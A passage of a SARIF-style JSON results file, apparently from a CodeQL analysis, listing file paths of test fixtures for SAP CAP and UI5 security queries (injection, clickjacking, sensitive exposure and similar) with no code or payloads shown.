ap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":171}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":172}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":173}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/model.cds.json","uriBaseId":"%SRCROOT%","index":174}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json","uriBaseId":"%SRCROOT%","index":175}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js","uriBaseId":"%SRCROOT%","index":176}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":177}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":178}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":179}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/db/schema.cds","uriBaseId":"%SRCROOT%","index":180}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/package.json","uriBaseId":"%SRCROOT%","index":181}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/model.cds.json","uriBaseId":"%SRCROOT%","index":182}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":183}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.cds","uriBaseId":"%SRCROOT%","index":184}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.cds","uriBaseId":"%SRCROOT%","index":185}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.js","uriBaseId":"%SRCROOT%","index":186}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds","uriBaseId":"%SRCROOT%","index":187}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/model.cds.json","uriBaseId":"%SRCROOT%","index":188}},{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/server.js","uriBaseId":"%SRCROOT%","index":189}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json","uriBaseId":"%SRCROOT%","index":190}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js","uriBaseId":"%SRCROOT%","index":191}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds","uriBaseId":"%SRCROOT%","index":192}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js","uriBaseId":"%SRCROOT%","index":193}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds","uriBaseId":"%SRCROOT%","index":194}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js","uriBaseId":"%SRCROOT%","index":195}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/db/schema.cds","uriBaseId":"%SRCROOT%","index":196}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/package.json","uriBaseId":"%SRCROOT%","index":197}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/server.js","uriBaseId":"%SRCROOT%","index":198}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds","uriBaseId":"%SRCROOT%","index":199}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.js","uriBaseId":"%SRCROOT%","index":200}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":201}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/model.cds.json","uriBaseId":"%SRCROOT%","index":202}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":203}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":204}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":205}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":206}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":207}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":208}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":209}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":210}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":211}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":212}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":213}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":214}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":215}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":216}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":218}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":219}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":220}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":221}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":222}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":223}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":224}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":225}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":226}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":227}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":228}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":229}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":230}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":231}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":232}},{"location":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233}},{"location":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234}},{"location":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/model.cds.json","uriBaseId":"%SRCROOT%","index":235}},{"location":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure-js-all-sinks/sensitive-exposure-heuristic-source.js","uriBaseId":"%SRCROOT%","index":236}},{"location":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.cds","uriBaseId":"%SRCROOT%","index":237}},{"location":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.js","uriBaseId":"%SRCROOT%","index":238}},{"location":{"uri":"javascript/frameworks/ui5/lib/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":239}},{"location":{"uri":"javascript/frameworks/ui5/lib/qlpack.yml","uriBaseId":"%SRCROOT%","index":240}},{"location":{"uri":"javascript/frameworks/ui5/src/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":241}},{"location":{"uri":"javascript/frameworks/ui5/src/qlpack.yml","uriBaseId":"%SRCROOT%","index":242}},{"location":{"uri":"javascript/frameworks/ui5/test/lib/BindingStringParser/test.js","uriBaseId":"%SRCROOT%","index":243}},{"location":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.js","uriBaseId":"%SRCROOT%","index":244}},{"location":{"uri":"javascript/frameworks/ui5/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":245}},{"location":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.view.html","uriBaseId":"%SRCROOT%","index":246}},{"location":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.view.json","uriBaseId":"%SRCROOT%","index":247}},{"location":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.view.xml","uriBaseId":"%SRCROOT%","index":248}},{"location":{"uri":"javascript/frameworks/ui5/test/lib/JsonParser/test.js","uriBaseId":"%SRCROOT%","index":249}},{"location":{"uri":"javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml","uriBaseId":"%SRCROOT%","index":250}},{"location":{"uri":"javascript/frameworks/ui5/test/models/binding_path/binding1.xml","uriBaseId":"%SRCROOT%","index":251}},{"location":{"uri":"javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml","uriBaseId":"%SRCROOT%","index":252}},{"location":{"uri":"javascript/frameworks/ui5/test/models/dynamic_write_to_html_content/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":253}},{"location":{"uri":"javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":254}},{"location":{"uri":"javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml","uriBaseId":"%SRCROOT%","index":255}},{"location":{"uri":"javascript/frameworks/ui5/test/models/sink/sink1.xml","uriBaseId":"%SRCROOT%","index":256}},{"location":{"uri":"javascript/frameworks/ui5/test/models/source/source1.xml","uriBaseId":"%SRCROOT%","index":257}},{"location":{"uri":"javascript/frameworks/ui5/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":258}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html","uriBaseId":"%SRCROOT%","index":259}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml","uriBaseId":"%SRCROOT%","index":260}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml","uriBaseId":"%SRCROOT%","index":261}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html","uriBaseId":"%SRCROOT%","index":262}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html","uriBaseId":"%SRCROOT%","index":263}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml","uriBaseId":"%SRCROOT%","index":264}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":265}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":266}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":267}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":268}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":269}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":270}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":271}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":272}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":273}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":274}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":275}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":276}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":278}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":279}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":280}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":281}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":282}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":283}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":284}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":285}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":286}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":287}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":288}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":289}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":291}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":292}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":293}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":294}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":295}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":296}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":297}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":298}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":299}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":300}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":301}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":302}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":303}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":304}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":305}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":306}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":307}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":308}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/package-lock.json","uriBaseId":"%SRCROOT%","index":309}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/ui5.yaml","uriBaseId":"%SRCROOT%","index":310}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/package.json","uriBaseId":"%SRCROOT%","index":311}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/index.html","uriBaseId":"%SRCROOT%","index":313}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/index.js","uriBaseId":"%SRCROOT%","index":314}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":315}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":316}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":317}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/package-lock.json","uriBaseId":"%SRCROOT%","index":318}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/package.json","uriBaseId":"%SRCROOT%","index":319}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/ui5.yaml","uriBaseId":"%SRCROOT%","index":320}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/index.html","uriBaseId":"%SRCROOT%","index":322}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/index.js","uriBaseId":"%SRCROOT%","index":323}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":324}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/package-lock.json","uriBaseId":"%SRCROOT%","index":326}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/package.json","uriBaseId":"%SRCROOT%","index":327}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/ui5.yaml","uriBaseId":"%SRCROOT%","index":328}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":329}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/index.html","uriBaseId":"%SRCROOT%","index":330}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":331}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":332}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":333}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/package-lock.json","uriBaseId":"%SRCROOT%","index":334}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/index.js","uriBaseId":"%SRCROOT%","index":335}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/ui5.yaml","uriBaseId":"%SRCROOT%","index":336}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":337}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/index.html","uriBaseId":"%SRCROOT%","index":338}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/index.js","uriBaseId":"%SRCROOT%","index":339}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/package.json","uriBaseId":"%SRCROOT%","index":340}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":341}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":342}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":343}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json","uriBaseId":"%SRCROOT%","index":344}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json","uriBaseId":"%SRCROOT%","index":345}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml","uriBaseId":"%SRCROOT%","index":346}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html","uriBaseId":"%SRCROOT%","index":348}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js","uriBaseId":"%SRCROOT%","index":349}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":350}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":351}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/package-lock.json","uriBaseId":"%SRCROOT%","index":352}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/package.json","uriBaseId":"%SRCROOT%","index":353}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/ui5.yaml","uriBaseId":"%SRCROOT%","index":354}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/index.js","uriBaseId":"%SRCROOT%","index":356}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/index.html","uriBaseId":"%SRCROOT%","index":357}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":358}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%",